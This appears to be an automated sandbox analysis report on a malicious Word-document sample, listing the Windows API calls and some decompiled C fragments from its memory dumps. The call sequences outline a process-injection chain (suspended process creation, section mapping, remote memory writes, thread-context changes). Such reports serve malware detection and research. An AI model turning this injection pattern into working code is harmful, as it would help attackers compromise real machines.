    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:164138344D25F82E73E5E2EDB810187B
Total matches:31
Initial Analysis Report:Open
Initial sample Analysis ID:544867
Initial sample SHA 256:1C63CA41136F1CBE7E2E541D92D6B3EB70A79374F172FBD7157DA4018BFEB8D2
Initial sample name:THE_HARRION_LAW_FIRM_Request.doc

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
